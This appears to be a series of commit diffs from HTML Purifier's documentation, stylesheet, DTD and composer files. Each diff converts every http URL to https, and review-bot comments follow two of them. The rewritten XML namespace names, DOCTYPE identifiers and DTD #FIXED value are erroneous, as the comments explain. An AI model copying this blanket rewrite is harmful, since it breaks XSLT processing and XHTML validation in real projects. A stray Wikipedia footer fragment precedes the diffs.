<li id="about"><a href="/wiki/Wikipedia:About" title="Wikipedia:About">About Wikipedia</a></li>
<li id="disclaimer"><a href="/wiki/Wikipedia:General_disclaimer" title="Wikipedia:General disclaimer">Disclaimers</a></li>
</ul>


@@ -3,13 +3,13 @@
"description": "Standards compliant HTML filter written in PHP",
"type": "library",
"keywords": ["html"],
"homepage": "http://htmlpurifier.org/",
"homepage": "https://htmlpurifier.org/",
"license": "LGPL",
"authors": [
{
"name": "Edward Z. Yang",
"email": "admin@htmlpurifier.org",
"homepage": "http://ezyang.com"
"homepage": "https://ezyang.com"
}
],
"require": {


@@ -1,14 +1,14 @@
<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet
version = "1.0"
xmlns = "http://www.w3.org/1999/xhtml"
xmlns:xsl = "http://www.w3.org/1999/XSL/Transform"
xmlns = "https://www.w3.org/1999/xhtml"
xmlns:xsl = "https://www.w3.org/1999/XSL/Transform"
>
<xsl:output
method = "xml"
encoding = "UTF-8"
doctype-public = "-//W3C//DTD XHTML 1.0 Transitional//EN"
doctype-system = "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"
doctype-system = "https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"
indent = "no"
media-type = "text/html"
/>
@@ -55,7 +55,7 @@
<xsl:attribute name="id">type-<xsl:value-of select="@id" /></xsl:attribute>
<h3><code><xsl:value-of select="@id" /></code>: <xsl:value-of select="@name" /></h3>
<div class="type-description">
<xsl:copy-of xmlns:xhtml="http://www.w3.org/1999/xhtml" select="xhtml:div/node()" />
<xsl:copy-of xmlns:xhtml="https://www.w3.org/1999/xhtml" select="xhtml:div/node()" />
</div>
</div>
</xsl:template>
@@ -113,7 +113,7 @@
</xsl:template>
<xsl:template match="namespace/description">
<div class="description">
<xsl:copy-of xmlns:xhtml="http://www.w3.org/1999/xhtml" select="xhtml:div/node()" />
<xsl:copy-of xmlns:xhtml="https://www.w3.org/1999/xhtml" select="xhtml:div/node()" />
</div>
</xsl:template>
@@ -163,7 +163,7 @@
</xsl:template>
<xsl:template match="directive/description">
<div class="description">
<xsl:copy-of xmlns:xhtml="http://www.w3.org/1999/xhtml" select="xhtml:div/node()" />
<xsl:copy-of xmlns:xhtml="https://www.w3.org/1999/xhtml" select="xhtml:div/node()" />
</div>
</xsl:template>
<xsl:template match="directive/deprecated">
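Review bot: The `xmlns:xsl` value in the first hunk of this stylesheet is a namespace name that processors compare as a literal string, not a link that gets fetched, so after the rewrite to `https://www.w3.org/1999/XSL/Transform` an XSLT processor will no longer treat `xsl:stylesheet`, `xsl:output`, `xsl:template` or `xsl:copy-of` as instructions; it should stay `xmlns:xsl = "http://www.w3.org/1999/XSL/Transform"`. The default `xmlns` and the three `xmlns:xhtml` attributes in the later hunks have the same problem and should remain `http://www.w3.org/1999/xhtml`, otherwise the generated elements are not in the XHTML namespace. The `<div xmlns=…>` wrappers in the types file that follows and the `<html xmlns=…>` root of the XHTML document after it carry the same change. The `doctype-system` identifier is also conventionally the `http://` form, and a catalog-based resolver would presumably stop matching the rewritten one, so it is worth confirming or reverting. A bulk scheme rewrite should skip namespace declarations and DOCTYPE identifiers and touch only real hyperlinks such as `href` values; the last template here opens inside the hunk and continues outside it.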


@@ -1,44 +1,44 @@
<?xml version="1.0" encoding="UTF-8"?>
<types>
<type id="string" name="String"><div xmlns="http://www.w3.org/1999/xhtml">
<type id="string" name="String"><div xmlns="https://www.w3.org/1999/xhtml">
A <a
href="http://docs.php.net/manual/en/language.types.string.php">sequence
href="https://docs.php.net/manual/en/language.types.string.php">sequence
of characters</a>.
</div></type>
<type id="istring" name="Case-insensitive string"><div xmlns="http://www.w3.org/1999/xhtml">
<type id="istring" name="Case-insensitive string"><div xmlns="https://www.w3.org/1999/xhtml">
A series of case-insensitive characters. Internally, upper-case
ASCII characters will be converted to lower-case.
</div></type>
<type id="text" name="Text"><div xmlns="http://www.w3.org/1999/xhtml">
<type id="text" name="Text"><div xmlns="https://www.w3.org/1999/xhtml">
A series of characters that may contain newlines. Text tends to
indicate human-oriented text, as opposed to a machine format.
</div></type>
<type id="itext" name="Case-insensitive text"><div xmlns="http://www.w3.org/1999/xhtml">
<type id="itext" name="Case-insensitive text"><div xmlns="https://www.w3.org/1999/xhtml">
A series of case-insensitive characters that may contain newlines.
</div></type>
<type id="int" name="Integer"><div xmlns="http://www.w3.org/1999/xhtml">
<type id="int" name="Integer"><div xmlns="https://www.w3.org/1999/xhtml">
An <a
href="http://docs.php.net/manual/en/language.types.integer.php">
href="https://docs.php.net/manual/en/language.types.integer.php">
integer</a>. You are alternatively permitted to pass a string of
digits instead, which will be cast to an integer using
<code>(int)</code>.
</div></type>
<type id="float" name="Float"><div xmlns="http://www.w3.org/1999/xhtml">
A <a href="http://docs.php.net/manual/en/language.types.float.php">
<type id="float" name="Float"><div xmlns="https://www.w3.org/1999/xhtml">
A <a href="https://docs.php.net/manual/en/language.types.float.php">
floating point number</a>. You are alternatively permitted to
pass a numeric string (as defined by <code>is_numeric()</code>),
which will be cast to a float using <code>(float)</code>.
</div></type>
<type id="bool" name="Boolean"><div xmlns="http://www.w3.org/1999/xhtml">
<type id="bool" name="Boolean"><div xmlns="https://www.w3.org/1999/xhtml">
A <a
href="http://docs.php.net/manual/en/language.types.boolean.php">boolean</a>.
href="https://docs.php.net/manual/en/language.types.boolean.php">boolean</a>.
You are alternatively permitted to pass an integer <code>0</code> or
<code>1</code> (other integers are not permitted) or a string
<code>"on"</code>, <code>"true"</code> or <code>"1"</code> for
<code>true</code>, and <code>"off"</code>, <code>"false"</code> or
<code>"0"</code> for <code>false</code>.
</div></type>
<type id="lookup" name="Lookup array"><div xmlns="http://www.w3.org/1999/xhtml">
<type id="lookup" name="Lookup array"><div xmlns="https://www.w3.org/1999/xhtml">
An array whose values are <code>true</code>, e.g. <code>array('key'
=> true, 'key2' => true)</code>. You are alternatively permitted
to pass an array list of the keys <code>array('key', 'key2')</code>
@@ -47,20 +47,20 @@
strictly numerically indexed: <code>array('key1', 2 =>
'key2')</code> will not do what you expect and emits a warning.
</div></type>
<type id="list" name="Array list"><div xmlns="http://www.w3.org/1999/xhtml">
<type id="list" name="Array list"><div xmlns="https://www.w3.org/1999/xhtml">
An array which has consecutive integer indexes, e.g.
<code>array('val1', 'val2')</code>. You are alternatively permitted
to pass a comma-separated string of keys <code>"val1, val2"</code>.
If your array is not in this form, <code>array_values</code> is run
on the array and a warning is emitted.
</div></type>
<type id="hash" name="Associative array"><div xmlns="http://www.w3.org/1999/xhtml">
<type id="hash" name="Associative array"><div xmlns="https://www.w3.org/1999/xhtml">
An array which is a mapping of keys to values, e.g.
<code>array('key1' => 'val1', 'key2' => 'val2')</code>. You are
alternatively permitted to pass a comma-separated string of
key-colon-value strings, e.g. <code>"key1: val1, key2: val2"</code>.
</div></type>
<type id="mixed" name="Mixed"><div xmlns="http://www.w3.org/1999/xhtml">
<type id="mixed" name="Mixed"><div xmlns="https://www.w3.org/1999/xhtml">
An arbitrary PHP value of any type.
</div></type>
</types>


@@ -1,7 +1,7 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head>
"https://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="https://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta name="description" content="Specification for HTML Purifier's advanced API for defining custom filtering behavior." />
<link rel="stylesheet" type="text/css" href="style.css" />
@@ -14,7 +14,7 @@
<div id="filing">Filed under Development</div>
<div id="index">Return to the <a href="index.html">index</a>.</div>
<div id="home"><a href="http://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div>
<div id="home"><a href="https://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div>
<p>
Please see <a href="enduser-customize.html">Customize!</a>


@@ -1,7 +1,7 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
"https://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="https://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta name="description" content="Describes config schema framework in HTML Purifier." />
@@ -14,7 +14,7 @@
<div id="filing">Filed under Development</div>
<div id="index">Return to the <a href="index.html">index</a>.</div>
<div id="home"><a href="http://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div>
<div id="home"><a href="https://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div>
<p>
HTML Purifier has a fairly complex system for configuration. Users
@@ -39,7 +39,7 @@
couldn't think of a more descriptive file extension.)
Directive files are actually what we call <code>StringHash</code>es,
i.e. associative arrays represented in a string form reminiscent of
<a href="http://qa.php.net/write-test.php">PHPT</a> tests. Here's a
<a href="https://qa.php.net/write-test.php">PHPT</a> tests. Here's a
sample directive file, <code>Test.Sample.txt</code>:
</p>
@@ -179,7 +179,7 @@ Test.Example</pre>
<tr>
<td>string</td>
<td>'Foo'</td>
<td><a href="http://docs.php.net/manual/en/language.types.string.php">String</a> without newlines</td>
<td><a href="https://docs.php.net/manual/en/language.types.string.php">String</a> without newlines</td>
</tr>
<tr>
<td>istring</td>
@@ -239,15 +239,15 @@ Test.Example</pre>
object; users have a little bit of leeway when setting configuration
values (for example, a lookup value can be specified as a list;
HTML Purifier will flip it as necessary.) These types are defined
in <a href="http://repo.or.cz/w/htmlpurifier.git?a=blob;hb=HEAD;f=library/HTMLPurifier/VarParser.php">
in <a href="https://repo.or.cz/w/htmlpurifier.git?a=blob;hb=HEAD;f=library/HTMLPurifier/VarParser.php">
library/HTMLPurifier/VarParser.php</a>.
</p>
<p>
For more information on what values are allowed, and how they are parsed,
consult <a href="http://repo.or.cz/w/htmlpurifier.git?a=blob;hb=HEAD;f=library/HTMLPurifier/ConfigSchema/InterchangeBuilder.php">
consult <a href="https://repo.or.cz/w/htmlpurifier.git?a=blob;hb=HEAD;f=library/HTMLPurifier/ConfigSchema/InterchangeBuilder.php">
library/HTMLPurifier/ConfigSchema/InterchangeBuilder.php</a>, as well
as <a href="http://repo.or.cz/w/htmlpurifier.git?a=blob;hb=HEAD;f=library/HTMLPurifier/ConfigSchema/Interchange/Directive.php">
as <a href="https://repo.or.cz/w/htmlpurifier.git?a=blob;hb=HEAD;f=library/HTMLPurifier/ConfigSchema/Interchange/Directive.php">
library/HTMLPurifier/ConfigSchema/Interchange/Directive.php</a> for
the semantics of the parsed values.
</p>
@@ -307,7 +307,7 @@ Test.Example</pre>
<p>
All directive files go through a rigorous validation process
through <a href="http://repo.or.cz/w/htmlpurifier.git?a=blob;hb=HEAD;f=library/HTMLPurifier/ConfigSchema/Validator.php">
through <a href="https://repo.or.cz/w/htmlpurifier.git?a=blob;hb=HEAD;f=library/HTMLPurifier/ConfigSchema/Validator.php">
library/HTMLPurifier/ConfigSchema/Validator.php</a>, as well
as some basic checks during building. While
listing every error out here is out-of-scope for this document, we
@@ -374,7 +374,7 @@ Test.Example</pre>
The most difficult part is translating the Interchange member variable (valueAliases)
into a directive file key (VALUE-ALIASES), but there's a one-to-one
correspondence currently. If the two formats diverge, any discrepancies
will be described in <a href="http://repo.or.cz/w/htmlpurifier.git?a=blob;hb=HEAD;f=library/HTMLPurifier/ConfigSchema/InterchangeBuilder.php">
will be described in <a href="https://repo.or.cz/w/htmlpurifier.git?a=blob;hb=HEAD;f=library/HTMLPurifier/ConfigSchema/InterchangeBuilder.php">
library/HTMLPurifier/ConfigSchema/InterchangeBuilder.php</a>.
</p>


@@ -1,7 +1,7 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
"https://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="https://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta name="description" content="Discusses when to flush HTML Purifier's various caches." />
@@ -14,7 +14,7 @@
<div id="filing">Filed under Development</div>
<div id="index">Return to the <a href="index.html">index</a>.</div>
<div id="home"><a href="http://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div>
<div id="home"><a href="https://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div>
<p>
If you've been poking around the various folders in HTML Purifier,


@@ -1,7 +1,7 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head>
"https://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="https://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta name="description" content="Defines class naming conventions in HTML Purifier." />
<link rel="stylesheet" type="text/css" href="./style.css" />
@@ -14,7 +14,7 @@
<div id="filing">Filed under Development</div>
<div id="index">Return to the <a href="index.html">index</a>.</div>
<div id="home"><a href="http://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div>
<div id="home"><a href="https://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div>
<p>The classes in this library follow a few naming conventions, which may
help you find the correct functionality more quickly. Here they are:</p>


@@ -1,7 +1,7 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head>
"https://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="https://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta name="description" content="Discusses possible methods of optimizing HTML Purifier." />
<link rel="stylesheet" type="text/css" href="./style.css" />
@@ -14,7 +14,7 @@
<div id="filing">Filed under Development</div>
<div id="index">Return to the <a href="index.html">index</a>.</div>
<div id="home"><a href="http://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div>
<div id="home"><a href="https://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div>
<p>Here are some possible optimization techniques we can apply to code sections if
they turn out to be slow. Be sure not to prematurely optimize: if you get


@@ -1,7 +1,7 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head>
"https://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="https://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta name="description" content="Tables detailing HTML element and CSS property implementation coverage in HTML Purifier." />
<link rel="stylesheet" type="text/css" href="./style.css" />
@@ -32,7 +32,7 @@ thead th {text-align:left;padding:0.1em;background-color:#EEE;}
<div id="filing">Filed under Development</div>
<div id="index">Return to the <a href="index.html">index</a>.</div>
<div id="home"><a href="http://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div>
<div id="home"><a href="https://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div>
<p>
<strong>Warning:</strong> This table is kept for historical purposes and


@@ -4,9 +4,9 @@
This is the same as HTML 4 Transitional except for
changes due to the differences between XML and SGML.
Namespace = http://www.w3.org/1999/xhtml
Namespace = https://www.w3.org/1999/xhtml
For further information, see: http://www.w3.org/TR/xhtml1
For further information, see: https://www.w3.org/TR/xhtml1
Copyright (c) 1998-2002 W3C (MIT, INRIA, Keio),
All Rights Reserved.
@@ -14,7 +14,7 @@
This DTD module is identified by the PUBLIC and SYSTEM identifiers:
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
SYSTEM "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"
SYSTEM "https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"
$Revision: 1.2 $
$Date: 2002/08/01 18:37:55 $
@@ -274,7 +274,7 @@
<!ATTLIST html
%i18n;
id ID #IMPLIED
xmlns %URI; #FIXED 'http://www.w3.org/1999/xhtml'
xmlns %URI; #FIXED 'https://www.w3.org/1999/xhtml'
>
<!--================ Document Head =======================================-->
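Review bot: The `#FIXED` value in the `<!ATTLIST html` declaration is now `'https://www.w3.org/1999/xhtml'`, but the XHTML namespace name is an opaque identifier that is compared as a string and never fetched, so a document declaring the real namespace no longer validates against this DTD; the line should stay `xmlns %URI; #FIXED 'http://www.w3.org/1999/xhtml'`. The same applies to the `Namespace =` comment and the `SYSTEM` identifier in the two header hunks of this file (XML catalogs match system identifiers by exact string), and to the `xmlns="https://www.w3.org/1999/xhtml"` attributes and DOCTYPE system identifiers rewritten in the XHTML pages elsewhere in this commit. A blanket replacement of `http://` should be limited to links that are actually dereferenced, such as `href` values. If this file belongs to a vendored third-party library (the neighbouring sections suggest HTML Purifier), editing it in place also makes the copy diverge from upstream, which makes it harder to verify against a release and to apply later security updates. The ATTLIST declaration continues outside the hunk.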


@@ -1,7 +1,7 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head>
"https://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="https://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta name="description" content="Tutorial for customizing HTML Purifier's tag and attribute sets." />
<link rel="stylesheet" type="text/css" href="style.css" />
@@ -15,7 +15,7 @@
<div id="filing">Filed under End-User</div>
<div id="index">Return to the <a href="index.html">index</a>.</div>
<div id="home"><a href="http://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div>
<div id="home"><a href="https://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div>
<p>
HTML Purifier has this quirk where if you try to allow certain elements or
@@ -44,7 +44,7 @@
<p>
All of the modules listed below are based off of the
<a href="http://www.w3.org/TR/2001/REC-xhtml-modularization-20010410/abstract_modules.html#sec_5.2.">modularization of
<a href="https://www.w3.org/TR/2001/REC-xhtml-modularization-20010410/abstract_modules.html#sec_5.2.">modularization of
XHTML</a>, which, while technically for XHTML 1.1, is quite a useful
resource.
</p>
@@ -76,7 +76,7 @@
<p>
As of HTMLPurifier 2.1.0, we have implemented the
<a href="http://www.w3.org/TR/2001/REC-ruby-20010531/">Ruby module</a>,
<a href="https://www.w3.org/TR/2001/REC-ruby-20010531/">Ruby module</a>,
which defines a set of tags
for publishing short annotations for text, used mostly in Japanese
and Chinese school texts, but applicable for positioning any text (not
@@ -86,7 +86,7 @@
<h3>HTML 5</h3>
<p>
<a href="http://www.whatwg.org/specs/web-apps/current-work/">HTML 5</a>
<a href="https://www.whatwg.org/specs/web-apps/current-work/">HTML 5</a>
is a fork of HTML 4.01 by WHATWG, who believed that XHTML 2.0 was headed
in the wrong direction. It too is a working draft, and may change
drastically before publication, but it should be noted that the
@@ -354,10 +354,10 @@ $def = $config-&gt;getHTMLDefinition(true);
<p>
For a complete list, consult
<a href="http://repo.or.cz/w/htmlpurifier.git?a=blob;hb=HEAD;f=library/HTMLPurifier/AttrTypes.php"><code>library/HTMLPurifier/AttrTypes.php</code></a>;
<a href="https://repo.or.cz/w/htmlpurifier.git?a=blob;hb=HEAD;f=library/HTMLPurifier/AttrTypes.php"><code>library/HTMLPurifier/AttrTypes.php</code></a>;
more information on attributes that accept parameters can be found on their
respective includes in
<a href="http://repo.or.cz/w/htmlpurifier.git?a=tree;hb=HEAD;f=library/HTMLPurifier/AttrDef"><code>library/HTMLPurifier/AttrDef</code></a>.
<a href="https://repo.or.cz/w/htmlpurifier.git?a=tree;hb=HEAD;f=library/HTMLPurifier/AttrDef"><code>library/HTMLPurifier/AttrDef</code></a>.
</p>
<p>
@@ -655,7 +655,7 @@ $def = $config-&gt;getHTMLDefinition(true);
<p class="aside">
Readers familiar with the modularization may have noticed that the Core
attribute collection differs from that specified by the <a
href="http://www.w3.org/TR/xhtml-modularization/abstract_modules.html#s_commonatts">abstract
href="https://www.w3.org/TR/xhtml-modularization/abstract_modules.html#s_commonatts">abstract
modules of the XHTML Modularization 1.1</a>. We believe this section
to be in error, as <code>br</code> permits the use of the <code>style</code>
attribute even though it uses the <code>Core</code> collection, and
@@ -676,7 +676,7 @@ $def = $config-&gt;getHTMLDefinition(true);
<p>
We're going to implement <code>form</code>. Before we embark, lets
grab a reference implementation from over at the
<a href="http://www.w3.org/TR/html4/sgml/loosedtd.html">transitional DTD</a>:
<a href="https://www.w3.org/TR/html4/sgml/loosedtd.html">transitional DTD</a>:
</p>
<pre>&lt;!ELEMENT FORM - - (%flow;)* -(FORM) -- interactive form --&gt;
@@ -746,7 +746,7 @@ $form-&gt;excludes = array('form' => true);</strong></pre>
<p>
And that's all there is to it! Implementing the rest of the form
module is left as an exercise to the user; to see more examples
check the <a href="http://repo.or.cz/w/htmlpurifier.git?a=tree;hb=HEAD;f=library/HTMLPurifier/HTMLModule"><code>library/HTMLPurifier/HTMLModule/</code></a> directory
check the <a href="https://repo.or.cz/w/htmlpurifier.git?a=tree;hb=HEAD;f=library/HTMLPurifier/HTMLModule"><code>library/HTMLPurifier/HTMLModule/</code></a> directory
in your local HTML Purifier installation.
</p>
@@ -771,8 +771,8 @@ $form-&gt;excludes = array('form' => true);</strong></pre>
</p>
<ul>
<li><a href="http://repo.or.cz/w/htmlpurifier.git?a=blob;hb=HEAD;f=library/HTMLPurifier/HTMLModule.php"><code>library/HTMLPurifier/HTMLModule.php</code></a></li>
<li><a href="http://repo.or.cz/w/htmlpurifier.git?a=blob;hb=HEAD;f=library/HTMLPurifier/ElementDef.php"><code>library/HTMLPurifier/ElementDef.php</code></a></li>
<li><a href="https://repo.or.cz/w/htmlpurifier.git?a=blob;hb=HEAD;f=library/HTMLPurifier/HTMLModule.php"><code>library/HTMLPurifier/HTMLModule.php</code></a></li>
<li><a href="https://repo.or.cz/w/htmlpurifier.git?a=blob;hb=HEAD;f=library/HTMLPurifier/ElementDef.php"><code>library/HTMLPurifier/ElementDef.php</code></a></li>
</ul>
<h2 id="optimized">Notes for HTML Purifier 4.2.0 and earlier</h3>
@@ -831,7 +831,7 @@ $purifier = new HTMLPurifier($config);</pre>
<p>
<em>Technical notes:</em> ajh pointed out on <a
href="http://htmlpurifier.org/phorum/read.php?5,5164,5169#msg-5169">in a forum topic</a> that
href="https://htmlpurifier.org/phorum/read.php?5,5164,5169#msg-5169">in a forum topic</a> that
HTML Purifier appeared to be repeatedly writing to the cache even
when a cache entry already existed. Investigation lead to the
discovery of the following infelicity: caching of customized


@@ -1,7 +1,7 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head>
"https://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="https://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta name="description" content="Explains various methods for allowing IDs in documents safely in HTML Purifier." />
<link rel="stylesheet" type="text/css" href="./style.css" />
@@ -15,7 +15,7 @@
<div id="filing">Filed under End-User</div>
<div id="index">Return to the <a href="index.html">index</a>.</div>
<div id="home"><a href="http://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div>
<div id="home"><a href="https://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div>
<p>Prior to HTML Purifier 1.2.0, this library blithely accepted user input that
looked like this:</p>


@@ -1,7 +1,7 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head>
"https://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="https://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta name="description" content="Explains how to speed up HTML Purifier through caching or inbound filtering." />
<link rel="stylesheet" type="text/css" href="./style.css" />
@@ -15,7 +15,7 @@
<div id="filing">Filed under End-User</div>
<div id="index">Return to the <a href="index.html">index</a>.</div>
<div id="home"><a href="http://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div>
<div id="home"><a href="https://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div>
<p>HTML Purifier is a very powerful library. But with power comes great
responsibility, in the form of longer execution times. Remember, this


@@ -1,7 +1,7 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head>
"https://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="https://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta name="description" content="Tutorial for tweaking HTML Purifier's Tidy-like behavior." />
<link rel="stylesheet" type="text/css" href="style.css" />
@@ -14,7 +14,7 @@
<div id="filing">Filed under Development</div>
<div id="index">Return to the <a href="index.html">index</a>.</div>
<div id="home"><a href="http://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div>
<div id="home"><a href="https://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div>
<p>You've probably heard of HTML Tidy, Dave Raggett's little piece
of software that cleans up poorly written HTML. Let me say it straight
@@ -156,7 +156,7 @@ these transformations will not work. Sorry mates.</p>
<p>You can review the rendering before and after of these transformations
by consulting the <a
href="http://htmlpurifier.org/live/smoketests/attrTransform.php">attrTransform.php
href="https://htmlpurifier.org/live/smoketests/attrTransform.php">attrTransform.php
smoketest</a>.</p>
<h2>I like the general idea, but the specifics bug me!</h2>


@@ -1,7 +1,7 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head>
"https://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="https://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta name="description" content="Tutorial for creating custom URI filters." />
<link rel="stylesheet" type="text/css" href="style.css" />
@@ -14,7 +14,7 @@
<div id="filing">Filed under End-User</div>
<div id="index">Return to the <a href="index.html">index</a>.</div>
<div id="home"><a href="http://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div>
<div id="home"><a href="https://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div>
<p>
This is a quick and dirty document to get you on your way to writing
@@ -93,7 +93,7 @@
<p>
Because the URI is presented to us in this form, and not
<code>http://bob@example.com:8080/foo.php?q=string#hash</code>, it saves us
<code>https://bob@example.com:8080/foo.php?q=string#hash</code>, it saves us
a lot of trouble in having to parse the URI every time we want to filter
it. For the record, the above URI has the following components:
</p>
@@ -192,7 +192,7 @@ $uri->addFilter(new HTMLPurifier_URIFilter_<strong>NameOfFilter</strong>(), $con
<p>
Check the
<a href="http://repo.or.cz/w/htmlpurifier.git?a=tree;hb=HEAD;f=library/HTMLPurifier/URIFilter">URIFilter</a>
<a href="https://repo.or.cz/w/htmlpurifier.git?a=tree;hb=HEAD;f=library/HTMLPurifier/URIFilter">URIFilter</a>
directory for more implementation examples, and see <a href="proposal-new-directives.txt">the
new directives proposal document</a> for ideas on what could be implemented
as a filter.


@@ -1,7 +1,7 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><head>
"https://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="https://www.w3.org/1999/xhtml" xml:lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta name="description" content="Describes the rationale for using UTF-8, the ramifications otherwise, and how to make the switch." />
<link rel="stylesheet" type="text/css" href="./style.css" />
@@ -22,7 +22,7 @@ own advice for sake of portability. -->
<div id="filing">Filed under End-User</div>
<div id="index">Return to the <a href="index.html">index</a>.</div>
